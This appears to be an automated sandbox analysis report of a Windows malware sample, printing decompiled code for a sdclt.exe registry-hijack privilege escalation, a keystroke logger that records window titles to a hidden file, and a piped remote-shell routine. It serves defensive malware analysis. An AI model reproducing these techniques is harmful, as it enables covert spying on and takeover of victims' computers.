                                        • Part of subcall function 0025DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0025DBCE
                                        • Part of subcall function 0025DB97: CloseHandle.KERNEL32(00000000), ref: 0025DBE3
                                      • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 0025F8E2
                                      • IsWow64Process.KERNEL32(00000000), ref: 0025F8E9
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 0025F920
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0025F952
                                      • lstrcatW.KERNEL32(?,\sdclt.exe), ref: 0025F964
                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0025F97C
                                      • ShellExecuteExW.SHELL32(?), ref: 0025F9AE
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0025F9B8
                                      • Sleep.KERNEL32(000007D0), ref: 0025F9D0
                                      • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 0025F9E0
                                      • ExitProcess.KERNEL32 ref: 0025F9E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExecuteShellToken$CloseDeleteDirectoryExitFileHandleInformationModuleNameOpenSleepSystemTerminateWow64lstrcat
                                      • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                      • API String ID: 194334098-2081737068
                                      • Opcode ID: c25418991aaaef46268e3c19cebd0dce2e3f7554f7b3bb926c36cd38b1c0b3c4
                                      • Instruction ID: bdf7f10dfcca6c27110ba841c2cedd7b66806f77c8315b267fa3765187288f81
                                      • Opcode Fuzzy Hash: c25418991aaaef46268e3c19cebd0dce2e3f7554f7b3bb926c36cd38b1c0b3c4
                                      • Instruction Fuzzy Hash: 77317EB1812518EBDB21EBA4ED4DEDEBBBCEF45701F0040A6FA09A2160D7744A59CB64
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 71%
                                      			E002574B4(void* __edx, void* __eflags) {
                                      				short _v176;
                                      				struct tagMSG _v204;
                                      				void* _v208;
                                      				struct _SYSTEMTIME _v228;
                                      				struct HINSTANCE__* _t19;
                                      				intOrPtr _t22;
                                      				intOrPtr _t25;
                                      				intOrPtr _t27;
                                      				intOrPtr _t40;
                                      				intOrPtr _t45;
                                      				void* _t46;
                                      				void* _t49;
                                      				intOrPtr* _t50;
                                      				void* _t59;
                                      				struct HINSTANCE__* _t60;
                                      				intOrPtr _t62;
                                      				intOrPtr _t64;
                                      				intOrPtr _t66;
                                      				void* _t68;
                                      				void* _t71;
                                      				void* _t75;
                                      				void* _t79;
                                      				void* _t90;
                                      
                                      				_t90 = __eflags;
                                      				_t71 = __edx;
                                      				_t19 = GetModuleHandleA(0);
                                      				_t62 =  *0x266690; // 0x0
                                      				_t60 = _t19;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				E00251052(_t62 + 0x210, 0, 0x800);
                                      				_t22 =  *0x266690; // 0x0
                                      				E00251052(_t22 + 0x10, 0, 0x208);
                                      				_t25 =  *0x266690; // 0x0
                                      				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
                                      				_t27 =  *0x266690; // 0x0
                                      				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
                                      				GetLocalTime( &_v228);
                                      				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
                                      				_t40 =  *0x266690; // 0x0
                                      				lstrcatW(_t40 + 0x10,  &_v176);
                                      				_t64 =  *0x266690; // 0x0
                                      				_t11 = _t64 + 0x10; // 0x10
                                      				E0025312C(_t64 + 0xc, _t71, _t11);
                                      				_t45 =  *0x266690; // 0x0
                                      				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
                                      				_t66 =  *0x266690; // 0x0
                                      				 *(_t66 + 4) = _t46;
                                      				CloseHandle(_t46);
                                      				_v228.wYear = 0;
                                      				_t68 = E0025FC79("c:\\windows\\system32\\user32.dll",  &_v228);
                                      				_t49 = E0025E970(_t68, 0, _t90);
                                      				_t91 = _t49;
                                      				if(_t49 == 0) {
                                      					_t50 =  *0x26668c; // 0x0
                                      				} else {
                                      					_push(_t68);
                                      					_t50 = E0025E907(_t49, "SetWindowsHookExA", _t91);
                                      					 *0x26668c = _t50;
                                      				}
                                      				 *_t50(0xd, E00257645, _t60, 0);
                                      				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
                                      					TranslateMessage( &_v204);
                                      					DispatchMessageA( &_v204);
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 002574C5
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00257519
                                      • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00257533
                                      • GetLocalTime.KERNEL32(?), ref: 0025753A
                                      • wsprintfW.USER32 ref: 0025756E
                                      • lstrcatW.KERNEL32(-00000010,?), ref: 00257585
                                      • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 002575B1
                                      • CloseHandle.KERNEL32(00000000), ref: 002575C1
                                        • Part of subcall function 0025FC79: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0025FCA6
                                        • Part of subcall function 0025FC79: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00252B6F), ref: 0025FCB1
                                        • Part of subcall function 0025FC79: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0025FCC2
                                        • Part of subcall function 0025FC79: CloseHandle.KERNEL32(00000000), ref: 0025FCC9
                                        • Part of subcall function 0025E970: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,757C68BC,00000000,?,?,?,?,002575E2), ref: 0025E99C
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00257634
                                        • Part of subcall function 0025E907: lstrcmpA.KERNEL32(?,0025F9CB,?,open,0025F9CB), ref: 0025E940
                                      • TranslateMessage.USER32(?), ref: 0025761B
                                      • DispatchMessageA.USER32(?), ref: 00257626
                                      Strings
                                      • c:\windows\system32\user32.dll, xrefs: 002575CF
                                      • SetWindowsHookExA, xrefs: 002575E7
                                      • \Microsoft Vision\, xrefs: 0025752D
                                      • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00257568
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$HandleMessage$CloseCreatelstrcat$AllocDispatchFolderLocalModulePathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                      • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                      • API String ID: 1431388325-3884914687
                                      • Opcode ID: d2ffda0c3d0f0d4a202ab5e0f161f9a4f84c32a0c38adf1c9469be1b8b389dd5
                                      • Instruction ID: ae11afe123cdfc27a00052b581584bee6dece79fce94bce4146257588dea7a8d
                                      • Opcode Fuzzy Hash: d2ffda0c3d0f0d4a202ab5e0f161f9a4f84c32a0c38adf1c9469be1b8b389dd5
                                      • Instruction Fuzzy Hash: 8B41BFB1514201ABD7149BA9FC0DF2B77ECFB88705F008919FE49D3191D6B8E928CB65
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0025CD2C(void* __eflags, char _a4) {
                                      				void* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				struct _SECURITY_ATTRIBUTES _v36;
                                      				void* _t54;
                                      				void* _t61;
                                      				void* _t64;
                                      				int _t66;
                                      				void* _t76;
                                      				int _t94;
                                      				void* _t95;
                                      
                                      				E0025CCBA(0x266550);
                                      				_v12 = _v12 & 0x00000000;
                                      				_v16 = _v16 & 0x00000000;
                                      				_v8 = _v8 & 0x00000000;
                                      				_t94 = 1;
                                      				_v20 = _v20 & 0x00000000;
                                      				_v24 = _v24 & 0x00000000;
                                      				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
                                      				_v36.nLength = 0xc;
                                      				_v36.bInheritHandle = 1;
                                      				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
                                      					L7:
                                      					E0025CEBD( &_v12);
                                      					E0025CEBD( &_v8);
                                      					E0025CEBD( &_v16);
                                      					E0025CEBD( &_v20);
                                      					E0025CEBD( &_v24);
                                      					E0025CCBA(0x266550);
                                      					_t94 = 0;
                                      				} else {
                                      					_t54 = GetCurrentProcess();
                                      					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
                                      						goto L7;
                                      					} else {
                                      						_t61 = GetCurrentProcess();
                                      						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x266558, 0, 0, 2) == 0) {
                                      							goto L7;
                                      						} else {
                                      							_t64 = GetCurrentProcess();
                                      							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x26655c, 0, 0, 2);
                                      							_t101 = _t66;
                                      							if(_t66 == 0) {
                                      								goto L7;
                                      							} else {
                                      								E0025CEBD( &_v12);
                                      								E0025CEBD( &_v20);
                                      								E0025345A(_t95,  &_a4);
                                      								if(E0025CACA(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
                                      									goto L7;
                                      								} else {
                                      									E0025CEBD( &_v8);
                                      									E0025CEBD( &_v24);
                                      									E0025CEBD( &_v16);
                                      									 *0x266560 = CreateEventA(0, 1, 0, 0);
                                      									_t76 = CreateThread(0, 0, E0025CB63, 0x266550, 0, 0x266568);
                                      									 *0x266564 = _t76;
                                      									if(_t76 == 0) {
                                      										goto L7;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				E00255A2D(_a4);
                                      				return _t94;
                                      			}

                                      APIs
                                        • Part of subcall function 0025CCBA: GetCurrentThreadId.KERNEL32(?,00000000,0025292E,00000000,exit,00000000,start), ref: 0025CCC6
                                        • Part of subcall function 0025CCBA: SetEvent.KERNEL32(00000000), ref: 0025CCDA
                                        • Part of subcall function 0025CCBA: WaitForSingleObject.KERNEL32(00266564,00001388), ref: 0025CCE7
                                        • Part of subcall function 0025CCBA: TerminateThread.KERNEL32(00266564,000000FE), ref: 0025CCF8
                                      • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 0025CD72
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0025CD8F
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0025CD95
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0025CD9E
                                      • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 0025CDB6
                                      • GetCurrentProcess.KERNEL32(00266558,00000000,00000000,00000002,?,00000000), ref: 0025CDCF
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0025CDD5
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0025CDD8
                                      • GetCurrentProcess.KERNEL32(0026655C,00000000,00000000,00000002,?,00000000), ref: 0025CDED
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0025CDF3
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0025CE49
                                      • CreateThread.KERNEL32(00000000,00000000,0025CB63,00266550,00000000,00266568), ref: 0025CE69
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0025CDF6
                                        • Part of subcall function 0025CEBD: CloseHandle.KERNEL32(00266560), ref: 0025CEC7
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 0025CACA: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0025CB1C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                      • String ID: Pe&$Pe&
                                      • API String ID: 337272696-560627266
                                      • Opcode ID: 388600f0c763fb5f7f7bb436d50ec634e801f78d9ec98332775df2d8e86f87bc
                                      • Instruction ID: 42efdd72b29e54c108c180d7cf4c3f3288cc7e0521d185217bf1365d334ca3cb
                                      • Opcode Fuzzy Hash: 388600f0c763fb5f7f7bb436d50ec634e801f78d9ec98332775df2d8e86f87bc
                                      • Instruction Fuzzy Hash: 08410371960309BEDB14EBE1DC4BFEE77B8AF14706F604416F901B60D1EB749A18CA68
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E00257AEB(void* __ecx, void* __edx, void* __eflags) {
                                      				struct _SECURITY_ATTRIBUTES* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				short _v536;
                                      				int _t35;
                                      				intOrPtr _t37;
                                      				int _t39;
                                      				intOrPtr _t40;
                                      				WCHAR* _t41;
                                      				intOrPtr _t43;
                                      				void* _t44;
                                      				int _t46;
                                      				intOrPtr _t48;
                                      				intOrPtr _t50;
                                      				long _t54;
                                      				intOrPtr _t55;
                                      				intOrPtr _t57;
                                      				void* _t59;
                                      				intOrPtr _t61;
                                      				intOrPtr _t63;
                                      				long _t65;
                                      				intOrPtr _t66;
                                      				void* _t70;
                                      				void* _t73;
                                      				intOrPtr _t83;
                                      				void* _t94;
                                      				void* _t97;
                                      				void* _t98;
                                      				void* _t100;
                                      
                                      				_t94 = __edx;
                                      				_v16 = __ecx;
                                      				E00251052( &_v536, 0, 0x208);
                                      				_v8 = 0;
                                      				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
                                      				_t106 = _t35;
                                      				if(_t35 <= 0) {
                                      					E0025312C( &_v8, _t94, L"{Unknown}");
                                      				} else {
                                      					_t73 = E00253412( &_v12,  &_v536);
                                      					E00253162(E00253297( &_v8, _t94, _t106, "{"), _t106, _t73);
                                      					E00253297(_t74, _t94, _t106, "}");
                                      					E00255A2D(_v12);
                                      					_v12 = 0;
                                      				}
                                      				_t37 =  *0x266690; // 0x0
                                      				_t39 = lstrlenW(_t37 + 0x210);
                                      				_t40 =  *0x266690; // 0x0
                                      				if(_t39 == 0) {
                                      					L6:
                                      					_t41 = _t40 + 0x210;
                                      					__eflags = _t41;
                                      					lstrcpyW(_t41, _v8);
                                      					_t43 =  *0x266690; // 0x0
                                      					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
                                      				} else {
                                      					_t70 = E00253075( &_v8, E00253412( &_v12, _t40 + 0x210));
                                      					E00255A2D(_v12);
                                      					_t40 =  *0x266690; // 0x0
                                      					_v12 = 0;
                                      					if(_t70 == 0) {
                                      						goto L6;
                                      					} else {
                                      						 *(_t40 + 0xa10) = 1;
                                      					}
                                      				}
                                      				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
                                      				_t83 =  *0x266690; // 0x0
                                      				 *(_t83 + 4) = _t44;
                                      				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
                                      					_t21 = _t83 + 8; // 0x8
                                      					_t98 = L"\r\n";
                                      					_t54 = lstrlenW(_t98);
                                      					_t55 =  *0x266690; // 0x0
                                      					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
                                      					_t57 =  *0x266690; // 0x0
                                      					_t59 = E0025308E( &_v8);
                                      					_t61 =  *0x266690; // 0x0
                                      					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
                                      					_t63 =  *0x266690; // 0x0
                                      					_t100 = L"\r\n";
                                      					_t65 = lstrlenW(_t100);
                                      					_t66 =  *0x266690; // 0x0
                                      					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
                                      					_t83 =  *0x266690; // 0x0
                                      				}
                                      				_t97 = _v16;
                                      				_t28 = _t83 + 8; // 0x8
                                      				_t46 = lstrlenW(_t97);
                                      				_t48 =  *0x266690; // 0x0
                                      				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
                                      				_t50 =  *0x266690; // 0x0
                                      				CloseHandle( *(_t50 + 4));
                                      				return E00255A2D(_v8);
                                      			}

                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00257B14
                                      • GetWindowTextW.USER32(00000000,?,00000104), ref: 00257B27
                                      • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00257B90
                                      • lstrcpyW.KERNEL32(-00000210,?), ref: 00257BDD
                                      • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00257BFE
                                      • lstrlenW.KERNEL32(002629A0,00000008,00000000,?,?), ref: 00257C27
                                      • WriteFile.KERNEL32(?,002629A0,00000000,?,?), ref: 00257C33
                                      • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000), ref: 00257C57
                                      • lstrlenW.KERNEL32(002629A0,-00000008,00000000,?,?), ref: 00257C6A
                                      • WriteFile.KERNEL32(?,002629A0,00000000,?,?), ref: 00257C76
                                      • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00257C88
                                      • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00257C96
                                      • CloseHandle.KERNEL32(?), ref: 00257CA0
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253162: lstrcatW.KERNEL32(00000000,?), ref: 00253192
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                      • String ID: {Unknown}
                                      • API String ID: 2314120260-4054869793
                                      • Opcode ID: 03ec0fb1490c8624238300ccabbfbe0a944fdca8bf8b9a0a788f3093487f3722
                                      • Instruction ID: 979059c251fe07daf600fd48607a16bbe84fb907dcec834ff96cb68627ad9bad
                                      • Opcode Fuzzy Hash: 03ec0fb1490c8624238300ccabbfbe0a944fdca8bf8b9a0a788f3093487f3722
                                      • Instruction Fuzzy Hash: BA516E71A10209EFD704EF64EC8EFAA77A8EB44305F148068F909E7291D7B4AE59CB54
                                      Uniqueness

                                      Uniqueness Score: 8.94%

                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 012E9B7F
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E9734
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E9746
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E9758
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E976A
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E977C
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E978E
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97A0
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97B2
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97C4
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97D6
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97E8
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E97FA
                                        • Part of subcall function 012E9717: _free.LIBCMT ref: 012E980C
                                      • _free.LIBCMT ref: 012E9B74
                                        • Part of subcall function 012E628A: HeapFree.KERNEL32(00000000,00000000), ref: 012E62A0
                                        • Part of subcall function 012E628A: GetLastError.KERNEL32(?,?,012E98A8,?,00000000,?,00000000,?,012E98CF,?,00000007,?,?,012E9CD3,?,?), ref: 012E62B2
                                      • _free.LIBCMT ref: 012E9B96
                                      • _free.LIBCMT ref: 012E9BAB
                                      • _free.LIBCMT ref: 012E9BB6
                                      • _free.LIBCMT ref: 012E9BD8
                                      • _free.LIBCMT ref: 012E9BEB
                                      • _free.LIBCMT ref: 012E9BF9
                                      • _free.LIBCMT ref: 012E9C04
                                      • _free.LIBCMT ref: 012E9C3C
                                      • _free.LIBCMT ref: 012E9C43
                                      • _free.LIBCMT ref: 012E9C60
                                      • _free.LIBCMT ref: 012E9C78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 164af381bd7468ee1c6df53ac027d8c720605b903a3fa641f3dfe61e7475240e
                                      • Instruction ID: 3b5f87b1e015293afa1e48d207b69bcdfcd4e343336c4c02e9387756506b8544
                                      • Opcode Fuzzy Hash: 164af381bd7468ee1c6df53ac027d8c720605b903a3fa641f3dfe61e7475240e
                                      • Instruction Fuzzy Hash: 85319171620306DFEF21AA39DC48BA677E8FF68219F90451AE259D7190EF35A890CB10
                                      Uniqueness

                                      Uniqueness Score: 0.25%

                                      C-Code - Quality: 100%
                                      			E0025B90E(struct _QUERY_SERVICE_CONFIG* _a4) {
                                      				int _v8;
                                      				void* __ecx;
                                      				void* _t10;
                                      				void* _t26;
                                      				struct _QUERY_SERVICE_CONFIG* _t34;
                                      				void* _t37;
                                      
                                      				_v8 = 0;
                                      				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);
                                      				_t37 = _t10;
                                      				if(_t37 != 0) {
                                      					_t26 = OpenServiceW(_t37,  *_a4, 1);
                                      					if(_t26 != 0) {
                                      						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
                                      							_t34 = E00255A87(_v8);
                                      							_a4 = _t34;
                                      							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
                                      								CloseServiceHandle(_t37);
                                      								CloseServiceHandle(_t26);
                                      								E002510C1(_a4);
                                      								_t10 =  *(_t34 + 4);
                                      							} else {
                                      								goto L6;
                                      							}
                                      						} else {
                                      							L6:
                                      							CloseServiceHandle(_t37);
                                      							CloseServiceHandle(_t26);
                                      							goto L7;
                                      						}
                                      					} else {
                                      						CloseServiceHandle(_t37);
                                      						L7:
                                      						_t10 = 0;
                                      					}
                                      				}
                                      				return _t10;
                                      			}

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0025B921
                                      • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0025B93A
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B947
                                      • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0025B956
                                      • GetLastError.KERNEL32 ref: 0025B960
                                      • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0025B981
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B992
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B995
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B9A5
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B9A8
                                        • Part of subcall function 002510C1: GetProcessHeap.KERNEL32(00000000,00000000,00253341,00000000,00000000,?,?,?,00000000), ref: 002510C7
                                        • Part of subcall function 002510C1: HeapFree.KERNEL32(00000000,?,?), ref: 002510CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                      • String ID: ServicesActive
                                      • API String ID: 1929760286-3071072050
                                      • Opcode ID: 3eb1966f140fa51ee323ae2ba7d89702d06878442057e79c5cfd9f964c35b1f0
                                      • Instruction ID: c70a57a0cdefb342b12925790d3838bd2fbee177f8f439e6e9d1db592d72ff4c
                                      • Opcode Fuzzy Hash: 3eb1966f140fa51ee323ae2ba7d89702d06878442057e79c5cfd9f964c35b1f0
                                      • Instruction Fuzzy Hash: ED115E71911515FBCB129F62EC88D9B7EACEB957517108025FA0592120DBB49E18CEA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 74%
                                      			E0025C253(struct _CRITICAL_SECTION* __ecx, void* __edx) {
                                      				char _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v48;
                                      				char _v52;
                                      				char _v56;
                                      				signed int _v60;
                                      				char _v64;
                                      				char _v68;
                                      				intOrPtr _v76;
                                      				int _t75;
                                      				int _t76;
                                      				int _t79;
                                      				int _t80;
                                      				void* _t82;
                                      				void* _t83;
                                      				int _t84;
                                      				int _t86;
                                      				int _t87;
                                      				int _t93;
                                      				void* _t94;
                                      				int _t132;
                                      				void* _t142;
                                      				char* _t143;
                                      				signed int _t154;
                                      				char* _t184;
                                      				intOrPtr _t193;
                                      				char* _t196;
                                      				void* _t199;
                                      				struct _CRITICAL_SECTION* _t202;
                                      				signed int _t211;
                                      				signed int _t213;
                                      				void* _t215;
                                      
                                      				_t199 = __edx;
                                      				_t156 = __ecx;
                                      				_t215 = (_t213 & 0xfffffff8) - 0x34;
                                      				_t202 = __ecx;
                                      				_t154 = 0;
                                      				_v36 = 0;
